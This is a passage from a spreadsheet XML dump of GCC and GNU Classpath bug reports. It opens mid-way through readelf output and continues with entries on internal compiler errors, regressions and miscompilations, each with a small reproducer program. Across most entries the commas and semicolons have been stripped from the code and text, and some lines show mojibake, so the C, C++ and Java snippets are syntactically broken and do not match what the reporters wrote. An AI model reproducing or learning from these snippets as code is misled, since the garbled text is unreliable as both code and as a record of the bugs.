  [ 5] .rela.gnu.debuglto_.debug_info RELA            0000000000000000 0005b0 000060 18   I 17   4  8
  [ 6] .debug_abbrev     PROGBITS        0000000000000000 000610 000028 00      0   0  1
  [ 7] .debug_str        PROGBITS        0000000000000000 000638 000085 00  MS  0   0  1
  [ 8]                   NULL            0000000000000000 0006bd 000000 00   E  0   0  1
  [ 9]                   NULL            0000000000000000 0006bd 000000 00   E  0   0  1
  [10]                   NULL            0000000000000000 0006bd 000000 00   E  0   0  1
  [11]                   NULL            0000000000000000 0006bd 000000 00   E  0   0  1
  [12]                   NULL            0000000000000000 0006bd 000000 00   E  0   0  1
  [13]                   NULL            0000000000000000 0006bd 000000 00   E  0   0  1
  [14]                   NULL            0000000000000000 0006bd 000000 00   E  0   0  1
  [15]                   NULL            0000000000000000 0006bd 000000 00   E  0   0  1
  [16]                   NULL            0000000000000000 0006bd 000000 00 MSE  0   0  1
  [17] .symtab           SYMTAB          0000000000000000 0006c0 0001e0 18     18  17  8
  [18] .strtab           STRTAB          0000000000000000 0008a0 00002e 00      0   0  1
  [19]                   NULL            0000000000000000 0008ce 000000 00   E  0   0  1
  [20] .shstrtab         STRTAB          0000000000000000 0008ce 00006c 00      0   0  1
Key to Flags:
  W (write) A (alloc) X (execute) M (merge) S (strings) I (info)
  L (link order) O (extra OS processing required) G (group) T (TLS)
  C (compressed) x (unknown) o (OS specific) E (exclude)
  p (processor specific)
There are no section groups in this file.
There are no program headers in this file.
There is no dynamic section in this file.
Relocation section '.rela.gnu.debuglto_.debug_info' at offset 0x5b0 contains 4 entries:
    Offset             Info             Type               Symbol's Value  Symbol's Name + Addend
0000000000000006  0000000600000102 R_AARCH64_ABS32        0000000000000000 .debug_abbrev + 0
000000000000000c  0000000700000102 R_AARCH64_ABS32        0000000000000000 .debug_str + 39
0000000000000015  0000000700000102 R_AARCH64_ABS32        0000000000000000 .debug_str + 0
000000000000001a  0000000700000102 R_AARCH64_ABS32        0000000000000000 .debug_str + 80
The decoding of unwind sections for machine type AArch64 is not currently supported.
Symbol table '.symtab' contains 20 entries:
   Num:    Value          Size Type    Bind   Vis      Ndx Name
     0: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND 
     1: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS a.c
     2: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND 
     3: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND 
     4: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND 
     5: 0000000000000000     0 SECTION LOCAL  DEFAULT    4 
     6: 0000000000000000     0 SECTION LOCAL  DEFAULT    6 
     7: 0000000000000000     0 SECTION LOCAL  DEFAULT    7 
     8: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND 
     9: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND 
    10: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND 
    11: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND 
    12: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND 
    13: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND 
    14: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND 
    15: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND 
    16: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND 
    17: 0000000000000000     0 NOTYPE  WEAK   HIDDEN     4 a.c.d4be4f80
    18: 0000000000000000     1 NOTYPE  GLOBAL DEFAULT  UND 
    19: 0000000000000000     1 NOTYPE  GLOBAL DEFAULT  UND 
No version information found in this file.</t>
  </si>
  <si>
    <t>GCC-41591</t>
  </si>
  <si>
    <t>documentation should document interaction of -flto and -fwhole-program</t>
  </si>
  <si>
    <t>e.g. when -fwhole-program should be specified at compile or at line time
and that it applies to the object files
I figured it out using the source and #gcc but it would be better in
the texinfo file.</t>
  </si>
  <si>
    <t>CLASSPATH-23468</t>
  </si>
  <si>
    <t>java.net.URI regex throws URISyntaxException given a URL</t>
  </si>
  <si>
    <t>If you try to create a java.net.URI passing a URL string such as
http://java.sun.com/j2se/1.3/ to the constructor it will throw a
URISyntaxException:
java.net.URISyntaxException: doesn't match URI regular expression:
http://java.sun.com/j2se/1.3/
   at java.net.URI.parseURI(java.lang.String) (/usr/lib/libgcj.so.6.0.0)
   at java.net.URI.URI(java.lang.String) (/usr/lib/libgcj.so.6.0.0)
It is my understanding that all URL's should be valid URI's.  That URL is an
example of a valid hierarchical URI taken right from Sun's java.net.URI online
documentation.  Also this worked using Sun's JVM/classes.
I am using Java tools from updated Fedora Core 4 with JPackage:
java --version
java version 1.4.2
gij (GNU libgcj) version 4.0.1 20050727 (Red Hat 4.0.1-5)</t>
  </si>
  <si>
    <t>GCC-22085</t>
  </si>
  <si>
    <t>[4.1 Regression] error with -fpreprocessed</t>
  </si>
  <si>
    <t>Try the following code with -maltivec -fpreprocessed:
int foo(__attribute__((altivec(vector__))) float x __attribute__((altivec(vector__))) float y) {
        if (__builtin_vec_vcmpeq_p (2 (x) (y))) return 3245
        else return 12
}</t>
  </si>
  <si>
    <t>GCC-7762</t>
  </si>
  <si>
    <t>cast problem with gcc-3.2 on x86 architectures</t>
  </si>
  <si>
    <t>/* 
Demonstrates a cast problem with gcc-3.2 on
    i686-pc-linux-gnu
    i386-pc-solaris2.8
but not on other systems tried (SunOS-sparc OSF1 etc.)
% uname -a
Linux catalina 2.4.9-21smp #1 SMP Thu Jan 17 14:01:48 EST 2002 \
  i686 unknown
%
% gcc -v
Reading specs from /u/bfkelly/public/gcc-3.2/Linux-x86/lib/gcc-lib/\
  i686-pc-linux-gnu/3.2/specs
Configured with: ../gcc-3.2/configure --enable-languages=c \
  --prefix=/u/bfkelly/public/gcc-3.2/Linux-x86
Thread model: posix
gcc version 3.2
%
% gcc -o foo foo.c
% foo
960.000000
960
960.000000
959          ????
%
*/
#include 
int
main()
{
  int n = 128000
  printf (%f\n 128000 * 0.0075)
  printf (%d\n (int) (128000 * 0.0075))
  printf (%f\n n * 0.0075)
  printf (%d\n (int) (n * 0.0075))
  return(0)
}
Release:
gcc-3.2
Environment:
% uname -a
Linux catalina 2.4.9-21smp #1 SMP Thu Jan 17 14:01:48 EST 2002 \
  i686 unknown
%
% gcc -v
Reading specs from /u/bfkelly/public/gcc-3.2/Linux-x86/lib/gcc-lib/\
  i686-pc-linux-gnu/3.2/specs
Configured with: ../gcc-3.2/configure --enable-languages=c \
  --prefix=/u/bfkelly/public/gcc-3.2/Linux-x86
Thread model: posix
gcc version 3.2
%
How-To-Repeat:
% gcc -o foo foo.c
% foo</t>
  </si>
  <si>
    <t>bfkelly</t>
  </si>
  <si>
    <t>GCC-56608</t>
  </si>
  <si>
    <t>[4.7 Regression] SLP seems to produce incorrect value with -ffast-math</t>
  </si>
  <si>
    <t>In some cases floor() seems to return 0 value even if its argument is larger than 1. This happens when compiling with '-O3 -ffast-math'.
Attached is the smallest code I found which reproduces the problem. The comments in the code explain how to reproduces the problem. There is also an example of how a small tweak hides the problem.
Udi</t>
  </si>
  <si>
    <t>udifuchs</t>
  </si>
  <si>
    <t>GCC-63405</t>
  </si>
  <si>
    <t>[4.9/5 regression] ICE in cp_perform_integral_promotions at cp/typeck.c:2084</t>
  </si>
  <si>
    <t>Created attachment 33609
Preprocessed file
Debian bug report: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=761549
Error message:
make[3]: Entering directory '/home/pashev/work/projects/pkg-open-axiom/build-tree/src/syntax'
g++ -DHAVE_CONFIG_H -I. -I../../../src/syntax -I../../config  -I../../../src/include -I../../x86_64-pc-linux-gnu/include -D_FORTIFY_SOURCE=2 -m64 -D_GNU_SOURCE  -std=c++11 -g -O2 -fstack-protector-strong -Wformat -Werror=format-security -O2 -Wall -c -o libsyntax_a-sexpr.o `test -f 'sexpr.cc' || echo '../../../src/syntax/'`sexpr.cc
In file included from ../../x86_64-pc-linux-gnu/include/open-axiom/sexpr:47:0
                 from ../../../src/syntax/sexpr.cc:39:
../../x86_64-pc-linux-gnu/include/open-axiom/storage: In instantiation of 'T* OpenAxiom::Memory::Factory::make(const Args T = OpenAxiom::Sexpr::ListSyntax]':
../../../src/syntax/sexpr.cc:345:37:   required from here
../../x86_64-pc-linux-gnu/include/open-axiom/storage:273:52: internal compiler error: in cp_perform_integral_promotions at cp/typeck.c:2066
             return new(this-&gt;allocate(1)) T{args...}
                                                    ^
# g++ -v
Using built-in specs.
COLLECT_GCC=/usr/bin/g++-4.9.real
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/4.9/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 4.9.1-14' --with-bugurl=file:///usr/share/doc/gcc-4.9/README.Bugs --enable-languages=cc++javagodfortranobjcobj-c++ --prefix=/usr --program-suffix=-4.9 --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.9 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --disable-vtable-verify --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-4.9-amd64/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-4.9-amd64 --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-4.9-amd64 --with-arch-directory=amd64 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --with-arch-32=i586 --with-abi=m64 --with-multilib-list=m32m64mx32 --enable-multilib --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.9.1 (Debian 4.9.1-14)</t>
  </si>
  <si>
    <t>GCC-80545</t>
  </si>
  <si>
    <t>option -Wstringop-overflow not recognized by Fortran</t>
  </si>
  <si>
    <t>As mentioned in bug 79929 comment 17 the -Wstringop-overflow warnings are enabled by -Wall and because they are implemented in the middle-end may be issued for code emitted by front ends other than C and C++.  But the corresponding options that control the warnings are C/C++ family only and aren't accepted by the driver for other front ends.  That makes it difficult to control the warnings.</t>
  </si>
  <si>
    <t>GCC-31439</t>
  </si>
  <si>
    <t>[4.3 regression] ICE with variadic template and broken specialization</t>
  </si>
  <si>
    <t>More fallout from the variadic templates on mainline:
===========================================================
template struct A
template struct A {}
template struct A : A {}
A a
===========================================================
bug.cc:3: error: template parameters not used in partial specialization:
bug.cc:3: error:         ''
bug.cc: In instantiation of 'A':
bug.cc:7:   instantiated from here
bug.cc:1: internal compiler error: Segmentation fault
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-5680</t>
  </si>
  <si>
    <t>Trouble extracting SSE values from a union</t>
  </si>
  <si>
    <t>The short program below
#include 
typedef int m128 __attribute__ ((mode(V4SI)))
typedef union {m128 ti unsigned int si[4]} m128x
int main(void)
{
    m128x a
    m128 w
    a.si[2] = 1
    w = a.ti
}
gives an ICE in expr.c line 2748 -- this is the abort() command when the two sides of an emit_move_insn have incompatible modes.
Release:
gcc-3.1-20020211
Environment:
SuSE Linux
How-To-Repeat:
Compile with -march=pentium4</t>
  </si>
  <si>
    <t>GCC-56868</t>
  </si>
  <si>
    <t>Constexpr example in 7.1.5/5 fails to compile correctly</t>
  </si>
  <si>
    <t>// The following example from 7.1.5/5 fails the static assert for g3(0)
constexpr int f(void *) { return 0 }
constexpr int f(...) { return 1 }
constexpr int g1() { return f(0) }
constexpr int g2(int n) { return f(n) }
constexpr int g3(int n) { return f(n*0) }
int main()
{
    static_assert(g1() == 0 g1 failed)
    static_assert(g2(0) == 1 g2 failed)
    static_assert(g3(0) == 1 g3 failed)  // fails g3(0) returns 0 not 1
}</t>
  </si>
  <si>
    <t>g++bug</t>
  </si>
  <si>
    <t>CLASSPATH-22879</t>
  </si>
  <si>
    <t>Use platform default encoding instead of US-ASCII when no encoding is specified</t>
  </si>
  <si>
    <t>GCC-25311</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE in reload_cse_simplify_operands at postreload.c:393</t>
  </si>
  <si>
    <t>Maybe related to 25310.  We fail to build xemacs with:
/usr/lib64/gcc/s390x-suse-linux/4.1.0/cc1 -fpreprocessed window.i -quiet -dumpbase window.i -m64 -mzarch -march=z900 -auxbase window -g -O2 -Wall -Wno-switch -Wundef -Wsign-compare -Wno-char-subscripts -Wpacked -Wunused-parameter -Wall -Wall -Wno-switch -version -fmessage-length=0 -fno-strict-aliasing -o /tmp/ccZf90fd.s
window.c: In function â€˜set_window_pixsizeâ€™:
window.c:3584: error: insn does not satisfy its constraints:
(insn:QI 70 410 71 4 window.c:3487 (set (reg:CCZ 33 %cc)
        (compare:CCZ (mem/s/j:DI (plus:DI (reg/v:DI 11 %r11 [orig:66 window ] [66])
                    (const_int 208 [0xd0])) [0 .parent+0 S8 A64])
            (mem/c/i:DI (reg:DI 13 %r13) [0 Qnil+0 S8 A64]))) 24 {*cmpdi_cct} (insn_list:REG_DEP_TRUE 67 (nil))
    (nil))
window.c:3584: internal compiler error: in reload_cse_simplify_operands at postreload.c:393
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-35768</t>
  </si>
  <si>
    <t>gcc.c-torture/compile/20010226-1.c:22: ICE: in do_output_reload at reload1.c:7331</t>
  </si>
  <si>
    <t>Executing on host: /home/dave/gnu/gcc-4.4/objdir/gcc/xgcc -B/home/dave/gnu/gcc-4.4/objdir/gcc/   -O0  -w -fno-show-column -c  -o 20010226-1.o /home/dave/gnu/gcc
-4.4/gcc/gcc/testsuite/gcc.c-torture/compile/20010226-1.c    (timeout = 300)
/home/dave/gnu/gcc-4.4/gcc/gcc/testsuite/gcc.c-torture/compile/20010226-1.c: In 
function 'foo':
/home/dave/gnu/gcc-4.4/gcc/gcc/testsuite/gcc.c-torture/compile/20010226-1.c:22: 
error: VOIDmode on an output
(insn 30 29 31 2 /home/dave/gnu/gcc-4.4/gcc/gcc/testsuite/gcc.c-torture/compile/
20010226-1.c:6 (parallel [
            (const_int 1 [0x1])
            (unspec_volatile [
                    (mem:BLK (scratch) [0 A8])                ] 1)
            (use (reg:SI 20 %r20 [108]))
            (use (reg:SI 19 %r19 [109]))            (use (reg:SI 28 %r28 [110]))            (clobber (scratch))
        ]) 244 {dcacheflush} (nil))/home/dave/gnu/gcc-4.4/gcc/gcc/testsuite/gcc.c-torture/compile/20010226-1.c:22: internal compiler error: in do_output_reload at reload1.c:7331
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
compiler exited with status 1
output is:
/home/dave/gnu/gcc-4.4/gcc/gcc/testsuite/gcc.c-torture/compile/20010226-1.c: In function 'foo':
/home/dave/gnu/gcc-4.4/gcc/gcc/testsuite/gcc.c-torture/compile/20010226-1.c:22: error: VOIDmode on an output
(insn 30 29 31 2 /home/dave/gnu/gcc-4.4/gcc/gcc/testsuite/gcc.c-torture/compile/20010226-1.c:6 (parallel [
            (const_int 1 [0x1])
            (unspec_volatile [
                    (mem:BLK (scratch) [0 A8])
                ] 1)
            (use (reg:SI 20 %r20 [108]))
            (use (reg:SI 19 %r19 [109]))
            (use (reg:SI 28 %r28 [110]))
            (clobber (scratch))
        ]) 244 {dcacheflush} (nil))
/home/dave/gnu/gcc-4.4/gcc/gcc/testsuite/gcc.c-torture/compile/20010226-1.c:22: internal compiler error: in do_output_reload at reload1.c:7331
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
FAIL: gcc.c-torture/compile/20010226-1.c  -O0  (internal compiler error)
FAIL: gcc.c-torture/compile/20010226-1.c  -O0  (test for excess errors)
Excess errors:
/home/dave/gnu/gcc-4.4/gcc/gcc/testsuite/gcc.c-torture/compile/20010226-1.c:22: error: VOIDmode on an output
(insn 30 29 31 2 /home/dave/gnu/gcc-4.4/gcc/gcc/testsuite/gcc.c-torture/compile/20010226-1.c:6 (parallel [
            (const_int 1 [0x1])
            (unspec_volatile [
                    (mem:BLK (scratch) [0 A8])
                ] 1)
            (use (reg:SI 20 %r20 [108]))
            (use (reg:SI 19 %r19 [109]))
            (use (reg:SI 28 %r28 [110]))
            (clobber (scratch))
        ]) 244 {dcacheflush} (nil))
/home/dave/gnu/gcc-4.4/gcc/gcc/testsuite/gcc.c-torture/compile/20010226-1.c:22: internal compiler error: in do_output_reload at reload1.c:7331</t>
  </si>
  <si>
    <t>GCC-66856</t>
  </si>
  <si>
    <t>[6 Regression] ICE in compute_live_loop_exits at tree-ssa-loop-manip.c:234</t>
  </si>
  <si>
    <t>Created attachment 35966
vectorizer dump
Firefox built with -flto and -O3 produces following ICE:
/home/marxin/Programming/gecko-dev/gfx/cairo/libpixman/src/pixman-fast-path.c: In function â€˜fast_write_back_r5g6b5â€™:
/home/marxin/Programming/gecko-dev/gfx/cairo/libpixman/src/pixman-fast-path.c:2459:1: internal compiler error: in compute_live_loop_exits at tree-ssa-loop-manip.c:234
 fast_write_back_r5g6b5 (pixman_iter_t *iter)
 ^
0xc8ed62 compute_live_loop_exits
	../../gcc/tree-ssa-loop-manip.c:234
0xc8ed62 add_exit_phis_var
	../../gcc/tree-ssa-loop-manip.c:321
0xc8ed62 add_exit_phis
	../../gcc/tree-ssa-loop-manip.c:343
0xc8ed62 rewrite_into_loop_closed_ssa(bitmap_head* unsigned int)
	../../gcc/tree-ssa-loop-manip.c:538
0xd87283 vectorize_loops()
	../../gcc/tree-vectorizer.c:586
Unfortunately as it's a ltrans issue it won't be hard to come up with a small reproducer.
Thus I attached vectorizer dump file hope it will help.
Thanks
Martin</t>
  </si>
  <si>
    <t>GCC-44322</t>
  </si>
  <si>
    <t>Bogus warning when assigning pointer-to-array with both const and restrict</t>
  </si>
  <si>
    <t>The following code is valid according to C99:
void * restrict const a[2]
void * restrict const (*p2)[2]
void foo(void) {
   p2 = 
}
However GCC complains with:
a.c: In function 'foo':
a.c:14:7: warning: assignment from incompatible pointer type
If either const or restrict (or both) is omitted from the declaration of 
a and p no warning is generated.
Despite the warning code generation and optimization behave properly.
FYI Clang 1.0.2 accepts this code without warning.</t>
  </si>
  <si>
    <t>r.c.poss</t>
  </si>
  <si>
    <t>GCC-26659</t>
  </si>
  <si>
    <t>[4.2 Regression] gcc.target/powerpc/ppc-vector-memset.c fails on the mainline</t>
  </si>
  <si>
    <t>gcc.target/powerpc/ppc-vector-memset.c fails on the mainline after one of the follow patches:
+2006-03-10  Richard Guenther  
+
+       PR middle-end/26565
+       * builtins.c (get_pointer_alignment): Handle component
+       references for field alignment.
+
+2006-03-10  Jorn Rennecke 
+
+       * config.gcc (sh*-superh-elf sh*elf (newlib)): Use newlib.h
+       when building with libgloss.
+       (sh*elf): Implement --without-fp option.
+       (sh64-superh-linux*): Don't multilib. 
+
+2006-03-10  Jorn Rennecke 
+
+       * struct-equiv.c (rtx_equiv_p): Fix POST_MODIFY case.
+
----
The only which could have an effect on this testcase is patch for PR middle-end/26565</t>
  </si>
  <si>
    <t>GCC-39595</t>
  </si>
  <si>
    <t>[4.4/4.5 Regression]ICE in vectorizable_store at tree-vect-transform.c:5361</t>
  </si>
  <si>
    <t>$ /usr/local/gfortran/bin/gfortran -c -fno-second-underscore -fdefault-integer-8 -m64 -DMOLPRO -I. -I.. -I../global -O3 dftgrid.f
dftgrid.f: In function 'grid_neighbour_dint':
dftgrid.f:4288: internal compiler error: vector VEC(treebase) index domain error in vectorizable_store at tree-vect-transform.c:5358
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$ gfortran -v
Using built-in specs.
Target: i386-apple-darwin8.10.1
Configured with: /tmp/gfortran-20090321/ibin/../gcc/configure --prefix=/usr/local/gfortran --enable-languages=cfortran --with-gmp=/tmp/gfortran-20090321/gfortran_libs --enable-bootstrap
Thread model: posix
gcc version 4.4.0 20090321 (experimental) [trunk revision 144983] (GCC) 
$ /usr/local/gfortran/bin/gfortran -c -fno-second-underscore -fdefault-integer-8 -m64 -DMOLPRO -I. -I.. -I../global -O2 dftgrid</t>
  </si>
  <si>
    <t>KnowlesPJ</t>
  </si>
  <si>
    <t>GCC-4479</t>
  </si>
  <si>
    <t>can't build under cygwin</t>
  </si>
  <si>
    <t>libiberty fails to build:
make[1]: Entering directory `/cygdrive/e/gcc-src/build2/libiberty'
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I../../gcc/libiberty/../include  -W -Wall -Wtraditional -pedant
ic  ../../gcc/libiberty/strerror.c -o pic/strerror.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I../../gcc/libiberty/../include  -W -Wall -Wtraditional -pedantic
 ../../gcc/libiberty/strerror.c
../../gcc/libiberty/strerror.c:465: warning: static declaration for `sys_nerr' follows non-static
../../gcc/libiberty/strerror.c:466: conflicting types for `sys_errlist'
/usr/include/sys/errno.h:23: previous declaration of `sys_errlist'
make[1]: *** [strerror.o] Error 1
make[1]: Leaving directory `/cygdrive/e/gcc-src/build2/libiberty'
make: *** [all-libiberty] Error 2
Release:
gcc_3_0_1_release
Environment:
latest cygwin release as of 5 Oct 2001
How-To-Repeat:
1. install fresh copy of latest cygwin release
2. get gcc_3_0_1_release from CVS
3. configure --with-languages=cc++
4. make bootstrap</t>
  </si>
  <si>
    <t>GCC-5926</t>
  </si>
  <si>
    <t>gcc 3.0.3 generates incorrect code with -O3 option</t>
  </si>
  <si>
    <t xml:space="preserve"> I've detected a problem when updated from gcc 2.95.2 . A result was different depending on the 
 order of a line of code were written without aparent cause when using -O3
Release:
3.0.3
Environment:
System: Linux mozart 2.2.19 #2 Sat Jun 2 21:32:31 CEST 2001 i586 unknown
Architecture: i586
host: i586-pc-linux-gnu
build: i586-pc-linux-gnu
target: i586-pc-linux-gnu
configured with: ./configure
How-To-Repeat:
 See the problem compiling the following code with -O3 option. The two routines are the same but
 a code of line changed. I think both results would be the same but I get different resuts.
-----------------------------------
#include 
#include 
#include 
size_t last_nsize=0
#define BITS_PER_LIMB 32
unsigned long Y_MASQY_LIMBY_MAXY_BITS
double Y_TINV
int bugy_routine(size_t n1 size_t n2)
{
  size_t nnsizeneeded=0i
  nsize= n1 + n2
  /*See whether all the initialization work con be avoided */
  needed=(nsize*BITS_PER_LIMB)
  Y_BITS = (unsigned long)((double)24.00 - 0.5*log((double)needed))
  Y_MASQ=((1U&lt;&lt;Y_BITS)-1L)
  Y_LIMB=(1U&lt;&lt;Y_BITS)
  Y_MAX=(1U&lt;&lt;(Y_BITS-1))
  Y_TINV=1.0/(double)Y_LIMB
  needed=(needed-1)/(size_t)Y_BITS+3 /****** LINE CHANGED *******/
  return needed
}
int nobugy_routine(size_t n1 size_t n2)
{
  size_t nnsizeneeded=0i
  int save
  nsize= n1 + n2
  /*See whether all the initialization work con be avoided */
  needed=(nsize*BITS_PER_LIMB)
  Y_BITS = (unsigned long)((double)24.00 - 0.5*log((double)needed))
  needed=(needed-1)/(size_t)Y_BITS+3 /****** LINE CHANGED *******/
  Y_MASQ=((1U&lt;&lt;Y_BITS)-1L)
  Y_LIMB=(1U&lt;&lt;Y_BITS)
  Y_MAX=(1U&lt;&lt;(Y_BITS-1))
  Y_TINV=1.0/(double)Y_LIMB
  return needed
}
int main(int argc char **argv)
{
  size_t n1=500 n2=500 res1 res2
  res1=nobugy_routine(n1n2)
  printf(Results of no bugy routine %i\nres1)
  res2=bugy_routine(n1n2)
  printf(Results of bugy routine %i\nres2)
}
------------------------------------------</t>
  </si>
  <si>
    <t>gbv</t>
  </si>
  <si>
    <t>GCC-3285</t>
  </si>
  <si>
    <t>gcj fails to resolve constructor calls in inner classes</t>
  </si>
  <si>
    <t>Compile the following code with gcj. The code compiles with javac.
gcj --main=Test Test.java 
Test.java: In class `Test$1':
Test.java: In method `(TestC1)':
Test.java:25: No constructor matching `(TestC1)' found in class `C2'.
           C1 c1 = new C1()
                            ^
1 error
--------------- Test.java -----------------------------
interface I
{
}
class C1
implements I
{
}
abstract
class C2
{
    C2(I i)
    {
    }
    abstract void h()
}
public
class Test
{
    public static
    void main(String argv[])
    {
        C1 c1 = new C1()
        new C2(c1)
        {
            void h()
            {
            }
        }
    }
}
Release:
unknown
Environment:
gcj gcc_ss_20010611 on linux
How-To-Repeat:
use: gcj --main=Test Test.java</t>
  </si>
  <si>
    <t>GCC-6448</t>
  </si>
  <si>
    <t>time_put::put with range contains empty implementation</t>
  </si>
  <si>
    <t>The implementation of time_put::put that takes an
format string range in locale_facets.h line 1159 -
1163 just returns the iterator given to it - i.e.
writes nothing to the stream.
Release:
3.0.4
Environment:
Sun Sparc
How-To-Repeat:
// time_put test
// Written by Dale Peakall 
#include 
#include 
#include 
#include 
int main(int argc char* argv[])
{
    // Get current time.
    std::time_t now
    std::time(
    std::tm* now_tm = std::gmtime(
    // Format current time.
    std::string fmt(%d/%m %H:%M:%S)
    std::stringstream s
    std::use_facet &gt;(s.getloc()).put(s s s.fill() now_tm 
    // Output current time.
    std::cout &lt;&lt; s.str() &lt;&lt; \n
}</t>
  </si>
  <si>
    <t>dale</t>
  </si>
  <si>
    <t>GCC-20</t>
  </si>
  <si>
    <t>using declarations in templates</t>
  </si>
  <si>
    <t>[Original Message-Id: ]
a using namespace inside a template declaration doesn't work :/
(egcs-1.1b didn't try it with a later version).
Example program:
-----------------------------------------------------------------
namespace N {
  void func(void) {}
}
template
void foobar(T)
{
  using namespace ::N
  func()
}
int main(void)
{
  foobar(1)  
  return 0
}
-----------------------------------------------------------------
~/c++/tests&gt;g++ -v namespace.cc
Reading specs from /usr/local/egcs/lib/gcc-lib/i686-pc-linux-gnu/egcs-2.91.57/specs
gcc version egcs-2.91.57 19980901 (egcs-1.1 release)
 /usr/local/egcs/lib/gcc-lib/i686-pc-linux-gnu/egcs-2.91.57/cpp -lang-c++ -v -undef -D__GNUC__=2 -D__GNUG__=2 -D__cplusplus -D__GNUC_MINOR__=91 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem(posix) -D__EXCEPTIONS -Asystem(unix) -Acpu(i386) -Amachine(i386) -Di386 -D__i386 -D__i386__ -Di686 -Dpentiumpro -D__i686 -D__i686__ -D__pentiumpro -D__pentiumpro__ namespace.cc /tmp/ccqfpULa.ii
GNU CPP version egcs-2.91.57 19980901 (egcs-1.1 release) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 /usr/local/egcs/include/g++
 /usr/local/include
 /usr/local/egcs/i686-pc-linux-gnu/include
 /usr/local/egcs/lib/gcc-lib/i686-pc-linux-gnu/egcs-2.91.57/include
 /usr/include
End of search list.
 /usr/local/egcs/lib/gcc-lib/i686-pc-linux-gnu/egcs-2.91.57/cc1plus /tmp/ccqfpULa.ii -quiet -dumpbase namespace.cc -version -o /tmp/ccygY4jd.s
GNU C++ version egcs-2.91.57 19980901 (egcs-1.1 release) (i686-pc-linux-gnu) compiled by GNU C version egcs-2.91.57 19980901 (egcs-1.1 release).
namespace.cc: In function `void foobar(int)':
namespace.cc:14:   instantiated from here
namespace.cc:9: `func' undeclared (first use this function)
namespace.cc:9: (Each undeclared identifier is reported only once
namespace.cc:9: for each function it appears in.)
Release:
2.96
Environment:
System: Linux mira 2.3.48 #4 Sun Feb 27 23:26:02 CET 2000 i586 unknown
Architecture: i586
host: i586-pc-linux-gnu
build: i586-pc-linux-gnu
target: i586-pc-linux-gnu</t>
  </si>
  <si>
    <t>GCC-27134</t>
  </si>
  <si>
    <t>[4.1 regression] ICE with floor and -ffast-math</t>
  </si>
  <si>
    <t>When compiling vtk-5.0 with gcc-4.1.0 there occurs an ICE.. preprocessed sourcefile attached.</t>
  </si>
  <si>
    <t>xtv</t>
  </si>
  <si>
    <t>GCC-8977</t>
  </si>
  <si>
    <t>g++ 3.2.2 unable to compile some code with template args</t>
  </si>
  <si>
    <t xml:space="preserve">	A small piece of code using templates args with explicit types
	fails to compile with g++ 3.2 (parse error) whereas it compiles
	fine with g++ 3.0 and Intel C++ 7.
Release:
3.2.2 20021212 (Debian prerelease) (Debian testing/unstable)
Environment:
System: Linux sakapuss 2.4.20-presario #1 jeu dÃ©c 12 11:23:52 GMT 2002 i686 unknown
Architecture: i686
host: i386-pc-linux-gnu
build: i386-pc-linux-gnu
target: i386-pc-linux-gnu
configured with: ../src/configure -v --enable-languages=cc++javaf77protopascalobjcada --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-gxx-include-dir=/usr/include/c++/3.2 --enable-shared --with-system-zlib --enable-nls --without-included-gettext --enable-__cxa_atexit --enable-clocale=gnu --enable-java-gc=boehm --enable-objc-gc i386-linux</t>
  </si>
  <si>
    <t>djalil.chafai</t>
  </si>
  <si>
    <t>GCC-48400</t>
  </si>
  <si>
    <t>[4.7 Regression] powerpc-apple-darwin9 fails to bootstrap at revision 171824</t>
  </si>
  <si>
    <t>powerpc-apple-darwin9 fails to bootstrap at revision 171824 (see http://gcc.gnu.org/ml/gcc-regression/2011-04/msg00015.html ). The failure is
